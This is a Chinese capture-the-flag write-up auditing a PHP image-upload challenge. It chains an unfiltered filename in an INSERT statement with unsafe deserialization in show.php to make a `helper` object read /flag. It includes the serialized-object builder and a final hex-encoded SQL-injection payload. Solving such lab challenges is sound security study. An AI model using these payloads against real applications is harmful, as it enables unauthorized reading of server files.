题目是给了源码的,主要就是代码审计
能用来读flag.php的代码是这个destruct方法,这里我们可以改config的值的,注意他是protected类型的变量,要进行%00构造一下,此外他在show.php那个页面会进行一个反序列化,并且是输出值的,我们就看看哪里能把这个构造的序列化字符串塞进去让它成功执行反序列化就好
public function view_files($path){
if ($this->ifview == False){
return False;
//The function is not yet perfect, it is not open yet.
}
$content = file_get_contents($path);
echo $content;
}
function __destruct(){
# Read some config html
$this->view_files($this->config);
}
构造出来
<?php
class helper {
protected $ifview = True;
protected $config = "/flag";
}
$a = new helper();
echo serialize($a);
?>
O:6:"helper":2:{s:9:"*ifview";b:1;s:9:"*config";s:5:"/flag";}
伪造成protected
O:6:"helper":2:{s:9:"\0\0\0ifview";b:1;s:9:"\0\0\0config";s:5:"/flag";}
最终执行的sql语句是这句,他在insert_array函数里
$sql = "INSERT INTO images (".(implode(",",$sql_fields)).") VALUES(".(implode(",",$sql_val)).")";
save函数调用insert_array函数
upload函数调用save函数,save函数里传入的值是$data,这也是后面要进行insert的内容,我们跟进getfile函数
public function upload($input="file")
{
$fileinfo = $this->getfile($input);
$array = array();
$array["title"] = $fileinfo['title']; //把经过getfile函数返回的数组接收为$array
$array["filename"] = $fileinfo['filename'];
$array["ext"] = $fileinfo['ext'];
$array["path"] = $fileinfo['path'];
$img_ext = getimagesize($_FILES[$input]["tmp_name"]);
$my_ext = array("width"=>$img_ext[0],"height"=>$img_ext[1]);
$array["attr"] = serialize($my_ext); //序列化
$id = $this->save($array);
if ($id == 0){
die("Something wrong!");
}
echo "<br>";
echo "<p>Your images is uploaded successfully. And your image's id is $id.</p>";
}
getfile函数调用check函数
public function getfile($input)
{
if(isset($input)){
$rs = $this->check($_FILES[$input]);
}
return $rs;
}
public function check($info)
{
$basename = substr(md5(time().uniqid()),9,16);
$filename = $info["name"]; //filename赋值为$info["name"]
$ext = substr(strrchr($filename, '.'), 1); //对传过来的后缀进行处理
$cate_exts = array("jpg","gif","png","jpeg");
if(!in_array($ext,$cate_exts)){ //白名单检测
die("<p>Please upload the correct image file!!!</p>");
}
$title = str_replace(".".$ext,'',$filename);
return array('title'=>$title,'filename'=>$basename.".".$ext,'ext'=>$ext,'path'=>$this->folder.$basename.".".$ext); //处理完成返回数组,也是后面传入sql语句的data,这里很重要,这里它对title没做任何过滤!!这里它后面show的是basename,但是还是把原来的文件名传入数据库了
}
这里攻击思路就有了,就是利用它对title没过滤传入我们构造的包含序列化字符串的payload,并且要符合他的insert语句实现insert注入,这样它把我们构造的payload存入数据库,之后show.php会去读取数据库内容,并且进行反序列化,然后展示
它这里也是对查到的东西都进行了反序列化,我们构造的序列化字符串就可以被成功反序列化成功
payload
1','1','1','1',0x4f3a363a2268656c706572223a323a7b733a393a225c305c305c30696676696577223b623a313b733a393a225c305c305c30636f6e666967223b733a353a222f666c6167223b7d),('1.jpg
参考:https://blog.csdn.net/mochu7777777/article/details/105165796